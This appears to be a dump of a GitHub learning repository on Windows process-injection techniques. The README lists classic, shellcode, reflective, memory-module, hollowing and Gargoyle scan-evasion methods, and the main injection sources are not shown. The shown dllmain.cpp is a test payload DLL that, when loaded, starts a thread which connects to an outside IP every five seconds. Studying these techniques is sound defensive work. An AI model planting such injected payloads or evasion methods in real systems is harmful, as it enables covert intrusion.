10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 |
23 |
24 | Source Files
25 |
26 |
27 | Source Files
28 |
29 |
30 |
--------------------------------------------------------------------------------
/MEMORY MODULE/MoudleMain.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/MEMORY MODULE/MoudleMain.cpp
--------------------------------------------------------------------------------
/MEMORY MODULE/x64/Debug/MEMORY MODULE.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/MemroyInjectionDLL/Debug/MemroyInjectionDLL.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/MemroyInjectionDLL/MemroyInjectionDLL.cpp:
--------------------------------------------------------------------------------
1 | // MemroyInjectionDLL.cpp : Defines the exported functions for the DLL application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include "MemroyInjectionDLL.h"
6 |
7 |
8 | // This is an example of an exported variable
// Exported example variable (wizard-generated); declared extern in
// MemroyInjectionDLL.h and never written anywhere in this file.
MEMROYINJECTIONDLL_API int nMemroyInjectionDLL=0;
10 |
11 | // This is an example of an exported function.
// Exported example function (wizard-generated); always yields the
// placeholder value 42.
MEMROYINJECTIONDLL_API int fnMemroyInjectionDLL(void)
{
	const int kPlaceholder = 42;
	return kPlaceholder;
}
16 |
17 | // This is the constructor of a class that has been exported.
18 | // see MemroyInjectionDLL.h for the class definition
// Default constructor of the exported example class; intentionally empty
// (see the class declaration in MemroyInjectionDLL.h).
CMemroyInjectionDLL::CMemroyInjectionDLL()
{
}
23 |
--------------------------------------------------------------------------------
/MemroyInjectionDLL/MemroyInjectionDLL.h:
--------------------------------------------------------------------------------
1 | // The following ifdef block is the standard way of creating macros which make exporting
2 | // from a DLL simpler. All files within this DLL are compiled with the MEMROYINJECTIONDLL_EXPORTS
3 | // symbol defined on the command line. This symbol should not be defined on any project
4 | // that uses this DLL. This way any other project whose source files include this file see
5 | // MEMROYINJECTIONDLL_API functions as being imported from a DLL, whereas this DLL sees symbols
6 | // defined with this macro as being exported.
7 | #ifdef MEMROYINJECTIONDLL_EXPORTS
8 | #define MEMROYINJECTIONDLL_API __declspec(dllexport)
9 | #else
10 | #define MEMROYINJECTIONDLL_API __declspec(dllimport)
11 | #endif
12 |
13 | // This class is exported from the MemroyInjectionDLL.dll
// Exported example class (wizard-generated). Only a default constructor is
// declared; its definition in MemroyInjectionDLL.cpp has an empty body.
class MEMROYINJECTIONDLL_API CMemroyInjectionDLL {
public:
	CMemroyInjectionDLL(void);
	// TODO: add your methods here.
};
19 |
// Exported example variable; defined (initialised to 0) in MemroyInjectionDLL.cpp.
extern MEMROYINJECTIONDLL_API int nMemroyInjectionDLL;

// Exported example function; its definition in MemroyInjectionDLL.cpp returns 42.
MEMROYINJECTIONDLL_API int fnMemroyInjectionDLL(void);
23 |
--------------------------------------------------------------------------------
/MemroyInjectionDLL/MemroyInjectionDLL.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {90E2E935-7557-4AFB-AD9E-B14EC84A243A}
23 | Win32Proj
24 | MemroyInjectionDLL
25 | 8.1
26 |
27 |
28 |
29 | DynamicLibrary
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | DynamicLibrary
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | DynamicLibrary
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | DynamicLibrary
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 |
81 |
82 | false
83 |
84 |
85 |
86 | Use
87 | Level3
88 | Disabled
89 | WIN32;_DEBUG;_WINDOWS;_USRDLL;MEMROYINJECTIONDLL_EXPORTS;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Windows
94 | true
95 |
96 |
97 |
98 |
99 | Use
100 | Level3
101 | Disabled
102 | _DEBUG;_WINDOWS;_USRDLL;MEMROYINJECTIONDLL_EXPORTS;%(PreprocessorDefinitions)
103 | true
104 |
105 |
106 | Windows
107 | true
108 |
109 |
110 |
111 |
112 | Level3
113 | Use
114 | MaxSpeed
115 | true
116 | true
117 | WIN32;NDEBUG;_WINDOWS;_USRDLL;MEMROYINJECTIONDLL_EXPORTS;%(PreprocessorDefinitions)
118 | true
119 |
120 |
121 | Windows
122 | true
123 | true
124 | true
125 |
126 |
127 |
128 |
129 | Level3
130 | Use
131 | MaxSpeed
132 | true
133 | true
134 | NDEBUG;_WINDOWS;_USRDLL;MEMROYINJECTIONDLL_EXPORTS;%(PreprocessorDefinitions)
135 | true
136 |
137 |
138 | Windows
139 | true
140 | true
141 | true
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 | false
155 |
156 |
157 | false
158 |
159 |
160 | false
161 |
162 |
163 | false
164 |
165 |
166 |
167 |
168 |
169 | Create
170 | Create
171 | Create
172 | Create
173 |
174 |
175 |
176 |
177 |
178 |
--------------------------------------------------------------------------------
/MemroyInjectionDLL/MemroyInjectionDLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 | Source Files
40 |
41 |
42 |
--------------------------------------------------------------------------------
/MemroyInjectionDLL/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : MemroyInjectionDLL Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this MemroyInjectionDLL DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your MemroyInjectionDLL application.
9 |
10 |
11 | MemroyInjectionDLL.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | MemroyInjectionDLL.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | MemroyInjectionDLL.cpp
25 | This is the main DLL source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named MemroyInjectionDLL.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/MemroyInjectionDLL/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 | #include
4 | #include
5 | #include
6 | #pragma comment(lib,"Ws2_32.lib")
7 | #define MAX_MSG_LEN 1500
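// One TCP connection attempt to 114.114.114.114:53, immediately torn down
// again. The connect() result is not inspected, so as written this is only a
// fire-and-forget connectivity check driven periodically by Connect().
// All failures are silent; every successful WSAStartup() is balanced by a
// WSACleanup() on every exit path.
void TryConnect()
{
	WSADATA wsa;
	if (WSAStartup(MAKEWORD(1, 1), &wsa) != 0)
	{
		return;  // Winsock unavailable: nothing has been acquired yet.
	}
	SOCKET m_socket = socket(AF_INET, SOCK_STREAM, 0);
	if (m_socket == INVALID_SOCKET)
	{
		// The original passed INVALID_SOCKET on to connect()/closesocket();
		// bail out, but still undo the WSAStartup() above.
		WSACleanup();
		return;
	}
	// Value-initialise so sin_zero (never assigned below) is not stack garbage.
	SOCKADDR_IN SocketSendIn = {};
	SocketSendIn.sin_family = AF_INET;
	SocketSendIn.sin_addr.S_un.S_addr = inet_addr("114.114.114.114");
	SocketSendIn.sin_port = htons(53);
	// sizeof(SOCKADDR_IN) equals sizeof(SOCKADDR) for AF_INET; named for clarity.
	connect(m_socket, reinterpret_cast<SOCKADDR*>(&SocketSendIn), sizeof(SOCKADDR_IN));
	closesocket(m_socket);
	WSACleanup();
}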
// Runs one connection attempt, pauses five seconds, and repeats forever;
// it never returns, so it must be driven from a dedicated thread
// (DllMain below starts one via inj()).
void __stdcall Connect()
{
	for (;;)
	{
		TryConnect();
		Sleep(5000);
	}
}
// Thread routine started by DllMain: hands control to Connect(), which
// never returns, so this function never returns either.
void WINAPI inj()
{
	Connect();
}
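// DLL entry point. On process attach it starts a worker thread running inj()
// and prints the new thread's id. Always returns TRUE.
//
// hModule / lpReserved are unused; ul_reason_for_call selects the action.
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
					 )
{
	(void)hModule;
	(void)lpReserved;
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
	{
		// NOTE(review): iostream output and CreateThread() here run under the
		// loader lock; kept as the author's debug output, but it is fragile.
		std::cout << "DLL_PROCESS_ATTACH" << std::endl;
		DWORD dwThreadId = 0;
		// inj is declared as void WINAPI inj(); the cast to
		// LPTHREAD_START_ROUTINE is carried over from the original code.
		HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)inj, NULL, 0, &dwThreadId);
		if (hThread != NULL)
		{
			// The original printed dwThreadId even when CreateThread() failed
			// (leaving it uninitialised) and never closed the handle. The
			// thread is never waited on, so releasing the handle right away
			// is correct; the thread keeps running.
			std::cout << dwThreadId << std::endl;
			CloseHandle(hThread);
		}
		break;
	}
	case DLL_THREAD_ATTACH:
		std::cout << "DLL_THREAD_ATTACH" << std::endl;
		break;
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}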
63 |
64 |
--------------------------------------------------------------------------------
/MemroyInjectionDLL/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // MemroyInjectionDLL.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/MemroyInjectionDLL/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 |
14 |
15 |
16 | // TODO: reference additional headers your program requires here
17 |
--------------------------------------------------------------------------------
/MemroyInjectionDLL/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/MemroyInjectionDLL/x64/Debug/MemroyInjectionDLL.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/ProcessInjection.VC.db:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ProcessInjection.VC.db
--------------------------------------------------------------------------------
/ProcessInjection.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 14
4 | VisualStudioVersion = 14.0.25420.1
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Gargoyle", "Gargoyle\Gargoyle.vcxproj", "{F313E731-84FF-42BB-8EF6-1FC64489C27E}"
7 | EndProject
8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HollowingDropper", "HollowingDropper\HollowingDropper.vcxproj", "{6DF3715B-102F-4B2F-8A47-F954478A017B}"
9 | EndProject
10 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InjectionDLL", "InjectionDLL\InjectionDLL.vcxproj", "{0FD4C0C2-380E-476F-8EAA-DB5CC1971D60}"
11 | EndProject
12 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EXEPayload", "EXEPayload\EXEPayload.vcxproj", "{974E1B91-0F7A-4139-9DE0-4617A02EA4F3}"
13 | EndProject
14 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ReflectiveDLLPEForm", "ReflectiveDLLPEForm\ReflectiveDLLPEForm.vcxproj", "{3AD41A2B-0A0F-41C3-AC4C-1A052BF902AB}"
15 | EndProject
16 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ReflectiveDLLInjection", "ReflectiveDLLInjection\ReflectiveDLLInjection.vcxproj", "{CEFFB8A5-3748-4AB5-AFAC-AA79F6BF5977}"
17 | EndProject
18 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "MEMORY MODULE", "MEMORY MODULE\MEMORY MODULE.vcxproj", "{9724121A-8D51-4686-BD83-45567A5E4229}"
19 | EndProject
20 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "MemroyInjectionDLL", "MemroyInjectionDLL\MemroyInjectionDLL.vcxproj", "{90E2E935-7557-4AFB-AD9E-B14EC84A243A}"
21 | EndProject
22 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DLLTest", "DLLTest\DLLTest.vcxproj", "{25F8D1B0-3C56-42EC-84AB-B4A01932DF51}"
23 | EndProject
24 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ShellcodeInjection", "ShellcodeInjection\ShellcodeInjection.vcxproj", "{45525617-1157-4230-8B6C-C559702469DF}"
25 | EndProject
26 | Global
27 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
28 | Debug|x64 = Debug|x64
29 | Debug|x86 = Debug|x86
30 | Release|x64 = Release|x64
31 | Release|x86 = Release|x86
32 | EndGlobalSection
33 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
34 | {F313E731-84FF-42BB-8EF6-1FC64489C27E}.Debug|x64.ActiveCfg = Debug|x64
35 | {F313E731-84FF-42BB-8EF6-1FC64489C27E}.Debug|x64.Build.0 = Debug|x64
36 | {F313E731-84FF-42BB-8EF6-1FC64489C27E}.Debug|x86.ActiveCfg = Debug|Win32
37 | {F313E731-84FF-42BB-8EF6-1FC64489C27E}.Debug|x86.Build.0 = Debug|Win32
38 | {F313E731-84FF-42BB-8EF6-1FC64489C27E}.Release|x64.ActiveCfg = Release|x64
39 | {F313E731-84FF-42BB-8EF6-1FC64489C27E}.Release|x64.Build.0 = Release|x64
40 | {F313E731-84FF-42BB-8EF6-1FC64489C27E}.Release|x86.ActiveCfg = Release|Win32
41 | {F313E731-84FF-42BB-8EF6-1FC64489C27E}.Release|x86.Build.0 = Release|Win32
42 | {6DF3715B-102F-4B2F-8A47-F954478A017B}.Debug|x64.ActiveCfg = Debug|x64
43 | {6DF3715B-102F-4B2F-8A47-F954478A017B}.Debug|x64.Build.0 = Debug|x64
44 | {6DF3715B-102F-4B2F-8A47-F954478A017B}.Debug|x86.ActiveCfg = Debug|Win32
45 | {6DF3715B-102F-4B2F-8A47-F954478A017B}.Debug|x86.Build.0 = Debug|Win32
46 | {6DF3715B-102F-4B2F-8A47-F954478A017B}.Release|x64.ActiveCfg = Release|x64
47 | {6DF3715B-102F-4B2F-8A47-F954478A017B}.Release|x64.Build.0 = Release|x64
48 | {6DF3715B-102F-4B2F-8A47-F954478A017B}.Release|x86.ActiveCfg = Release|Win32
49 | {6DF3715B-102F-4B2F-8A47-F954478A017B}.Release|x86.Build.0 = Release|Win32
50 | {0FD4C0C2-380E-476F-8EAA-DB5CC1971D60}.Debug|x64.ActiveCfg = Debug|x64
51 | {0FD4C0C2-380E-476F-8EAA-DB5CC1971D60}.Debug|x64.Build.0 = Debug|x64
52 | {0FD4C0C2-380E-476F-8EAA-DB5CC1971D60}.Debug|x86.ActiveCfg = Debug|Win32
53 | {0FD4C0C2-380E-476F-8EAA-DB5CC1971D60}.Debug|x86.Build.0 = Debug|Win32
54 | {0FD4C0C2-380E-476F-8EAA-DB5CC1971D60}.Release|x64.ActiveCfg = Release|x64
55 | {0FD4C0C2-380E-476F-8EAA-DB5CC1971D60}.Release|x64.Build.0 = Release|x64
56 | {0FD4C0C2-380E-476F-8EAA-DB5CC1971D60}.Release|x86.ActiveCfg = Release|Win32
57 | {0FD4C0C2-380E-476F-8EAA-DB5CC1971D60}.Release|x86.Build.0 = Release|Win32
58 | {974E1B91-0F7A-4139-9DE0-4617A02EA4F3}.Debug|x64.ActiveCfg = Debug|x64
59 | {974E1B91-0F7A-4139-9DE0-4617A02EA4F3}.Debug|x64.Build.0 = Debug|x64
60 | {974E1B91-0F7A-4139-9DE0-4617A02EA4F3}.Debug|x86.ActiveCfg = Debug|Win32
61 | {974E1B91-0F7A-4139-9DE0-4617A02EA4F3}.Debug|x86.Build.0 = Debug|Win32
62 | {974E1B91-0F7A-4139-9DE0-4617A02EA4F3}.Release|x64.ActiveCfg = Release|x64
63 | {974E1B91-0F7A-4139-9DE0-4617A02EA4F3}.Release|x64.Build.0 = Release|x64
64 | {974E1B91-0F7A-4139-9DE0-4617A02EA4F3}.Release|x86.ActiveCfg = Release|Win32
65 | {974E1B91-0F7A-4139-9DE0-4617A02EA4F3}.Release|x86.Build.0 = Release|Win32
66 | {3AD41A2B-0A0F-41C3-AC4C-1A052BF902AB}.Debug|x64.ActiveCfg = Debug|x64
67 | {3AD41A2B-0A0F-41C3-AC4C-1A052BF902AB}.Debug|x64.Build.0 = Debug|x64
68 | {3AD41A2B-0A0F-41C3-AC4C-1A052BF902AB}.Debug|x86.ActiveCfg = Debug|Win32
69 | {3AD41A2B-0A0F-41C3-AC4C-1A052BF902AB}.Debug|x86.Build.0 = Debug|Win32
70 | {3AD41A2B-0A0F-41C3-AC4C-1A052BF902AB}.Release|x64.ActiveCfg = Release|x64
71 | {3AD41A2B-0A0F-41C3-AC4C-1A052BF902AB}.Release|x64.Build.0 = Release|x64
72 | {3AD41A2B-0A0F-41C3-AC4C-1A052BF902AB}.Release|x86.ActiveCfg = Release|Win32
73 | {3AD41A2B-0A0F-41C3-AC4C-1A052BF902AB}.Release|x86.Build.0 = Release|Win32
74 | {CEFFB8A5-3748-4AB5-AFAC-AA79F6BF5977}.Debug|x64.ActiveCfg = Debug|x64
75 | {CEFFB8A5-3748-4AB5-AFAC-AA79F6BF5977}.Debug|x64.Build.0 = Debug|x64
76 | {CEFFB8A5-3748-4AB5-AFAC-AA79F6BF5977}.Debug|x86.ActiveCfg = Debug|Win32
77 | {CEFFB8A5-3748-4AB5-AFAC-AA79F6BF5977}.Debug|x86.Build.0 = Debug|Win32
78 | {CEFFB8A5-3748-4AB5-AFAC-AA79F6BF5977}.Release|x64.ActiveCfg = Release|x64
79 | {CEFFB8A5-3748-4AB5-AFAC-AA79F6BF5977}.Release|x64.Build.0 = Release|x64
80 | {CEFFB8A5-3748-4AB5-AFAC-AA79F6BF5977}.Release|x86.ActiveCfg = Release|Win32
81 | {CEFFB8A5-3748-4AB5-AFAC-AA79F6BF5977}.Release|x86.Build.0 = Release|Win32
82 | {9724121A-8D51-4686-BD83-45567A5E4229}.Debug|x64.ActiveCfg = Debug|x64
83 | {9724121A-8D51-4686-BD83-45567A5E4229}.Debug|x64.Build.0 = Debug|x64
84 | {9724121A-8D51-4686-BD83-45567A5E4229}.Debug|x86.ActiveCfg = Debug|Win32
85 | {9724121A-8D51-4686-BD83-45567A5E4229}.Debug|x86.Build.0 = Debug|Win32
86 | {9724121A-8D51-4686-BD83-45567A5E4229}.Release|x64.ActiveCfg = Release|x64
87 | {9724121A-8D51-4686-BD83-45567A5E4229}.Release|x64.Build.0 = Release|x64
88 | {9724121A-8D51-4686-BD83-45567A5E4229}.Release|x86.ActiveCfg = Release|Win32
89 | {9724121A-8D51-4686-BD83-45567A5E4229}.Release|x86.Build.0 = Release|Win32
90 | {90E2E935-7557-4AFB-AD9E-B14EC84A243A}.Debug|x64.ActiveCfg = Debug|x64
91 | {90E2E935-7557-4AFB-AD9E-B14EC84A243A}.Debug|x64.Build.0 = Debug|x64
92 | {90E2E935-7557-4AFB-AD9E-B14EC84A243A}.Debug|x86.ActiveCfg = Debug|Win32
93 | {90E2E935-7557-4AFB-AD9E-B14EC84A243A}.Debug|x86.Build.0 = Debug|Win32
94 | {90E2E935-7557-4AFB-AD9E-B14EC84A243A}.Release|x64.ActiveCfg = Release|x64
95 | {90E2E935-7557-4AFB-AD9E-B14EC84A243A}.Release|x64.Build.0 = Release|x64
96 | {90E2E935-7557-4AFB-AD9E-B14EC84A243A}.Release|x86.ActiveCfg = Release|Win32
97 | {90E2E935-7557-4AFB-AD9E-B14EC84A243A}.Release|x86.Build.0 = Release|Win32
98 | {25F8D1B0-3C56-42EC-84AB-B4A01932DF51}.Debug|x64.ActiveCfg = Debug|x64
99 | {25F8D1B0-3C56-42EC-84AB-B4A01932DF51}.Debug|x64.Build.0 = Debug|x64
100 | {25F8D1B0-3C56-42EC-84AB-B4A01932DF51}.Debug|x86.ActiveCfg = Debug|Win32
101 | {25F8D1B0-3C56-42EC-84AB-B4A01932DF51}.Debug|x86.Build.0 = Debug|Win32
102 | {25F8D1B0-3C56-42EC-84AB-B4A01932DF51}.Release|x64.ActiveCfg = Release|x64
103 | {25F8D1B0-3C56-42EC-84AB-B4A01932DF51}.Release|x64.Build.0 = Release|x64
104 | {25F8D1B0-3C56-42EC-84AB-B4A01932DF51}.Release|x86.ActiveCfg = Release|Win32
105 | {25F8D1B0-3C56-42EC-84AB-B4A01932DF51}.Release|x86.Build.0 = Release|Win32
106 | {45525617-1157-4230-8B6C-C559702469DF}.Debug|x64.ActiveCfg = Debug|x64
107 | {45525617-1157-4230-8B6C-C559702469DF}.Debug|x64.Build.0 = Debug|x64
108 | {45525617-1157-4230-8B6C-C559702469DF}.Debug|x86.ActiveCfg = Debug|Win32
109 | {45525617-1157-4230-8B6C-C559702469DF}.Debug|x86.Build.0 = Debug|Win32
110 | {45525617-1157-4230-8B6C-C559702469DF}.Release|x64.ActiveCfg = Release|x64
111 | {45525617-1157-4230-8B6C-C559702469DF}.Release|x64.Build.0 = Release|x64
112 | {45525617-1157-4230-8B6C-C559702469DF}.Release|x86.ActiveCfg = Release|Win32
113 | {45525617-1157-4230-8B6C-C559702469DF}.Release|x86.Build.0 = Release|Win32
114 | EndGlobalSection
115 | GlobalSection(SolutionProperties) = preSolution
116 | HideSolutionNode = FALSE
117 | EndGlobalSection
118 | EndGlobal
119 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # **ProcessInjection**
2 |
3 | # 一些进程注入方法的实现及分析,分析在:[看雪论坛](https://bbs.pediy.com/user-703263.htm)
4 |
5 |
6 | ## **已完成**:
7 |
8 | 1. **Classic Injection**
9 | * CommonInjection
10 | * InjectionDLL
11 | * DLLTest
12 | 2. **Shellcode Injection**
13 | * ShellcodeInjdection
14 | > x64,shellcode使用msf生成。
15 | 3. **Reflection Injection**
16 | * ReflectiveDLLInjection
17 | * ReflectiveDLL
18 | * ReflectiveDLLPEForm
19 | >代码参考:https://github.com/stephenfewer/ReflectiveDLLInjection
20 | >为方便调试,该工程是在外部实现的对DLL的解析,其实已经与下一个项目相同。
21 |
22 |
23 | 4. **MEMORY MODULE**
24 |
25 | * Memory Module
26 | * MemroyInjectionDLL
27 | >使用了Reflection Injection的代码,对部分代码进行了修改。
28 | >参考:https://github.com/fancycode/MemoryModule
29 |
30 |
31 | 5. **Process Hollowing(冷注入)**
32 |
33 | * EXEPayload
34 | * HollowingDropper
35 | >参考:https://github.com/m0n0ph1/Process-Hollowing
36 | 在原项目的基础上,重写了项目,支持x86和x64
37 | "热"注入失败,以后再尝试。给出文章链接:
38 |
39 | 6. **Gargoyle(石像鬼)**
40 | * Gargoyle
41 | >参考:https://jlospinoso.github.io/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html
42 | >简介:该项目是一种对内存扫描逃避技术的PoC。只支持x86,x64下没有尝试更改。
43 |
44 |
45 | ## **进行中**:
46 |
47 | + Process Hollowing(热注入)
48 | >http://riscy.business/2017/11/bypassing-modern-process-hollowing-detection/
49 |
50 | >***“images”文件夹是在学习过程中,会遇到的一些数据结构的可视化图片,方便查阅相关结构。***
51 |
--------------------------------------------------------------------------------
/ReflectiveDLL/Debug/ReflectiveDLL.log:
--------------------------------------------------------------------------------
1 | stdafx.cpp
2 | dllmain.cpp
3 | ReflectiveDLL.cpp
4 | d:\users\sudo\documents\github\processinjection\reflectivedll\reflectivedll.cpp(70): error C3861: '__readgsqword': identifier not found
5 |
--------------------------------------------------------------------------------
/ReflectiveDLL/Debug/ReflectiveDLL.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/Debug/ReflectiveDLL.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/ReflectiveDLL/Debug/ReflectiveDLL.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/Debug/ReflectiveDLL.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/ReflectiveDLL/Debug/ReflectiveDLL.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/Debug/ReflectiveDLL.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/ReflectiveDLL/Debug/ReflectiveDLL.tlog/ReflectiveDLL.lastbuildstate:
--------------------------------------------------------------------------------
1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=8.1
2 | Debug|Win32|C:\Users\sudo\Desktop\ReflectiveDLLPEForm\|
3 |
--------------------------------------------------------------------------------
/ReflectiveDLL/Debug/ReflectiveDLL.tlog/unsuccessfulbuild:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/Debug/ReflectiveDLL.tlog/unsuccessfulbuild
--------------------------------------------------------------------------------
/ReflectiveDLL/Debug/vc140.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/Debug/vc140.idb
--------------------------------------------------------------------------------
/ReflectiveDLL/Debug/vc140.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/Debug/vc140.pdb
--------------------------------------------------------------------------------
/ReflectiveDLL/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : ReflectiveDLL Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this ReflectiveDLL DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your ReflectiveDLL application.
9 |
10 |
11 | ReflectiveDLL.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | ReflectiveDLL.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | ReflectiveDLL.cpp
25 | This is the main DLL source file.
26 |
27 | When created, this DLL does not export any symbols. As a result, it
28 | will not produce a .lib file when it is built. If you wish this project
29 | to be a project dependency of some other project, you will either need to
30 | add code to export some symbols from the DLL so that an export library
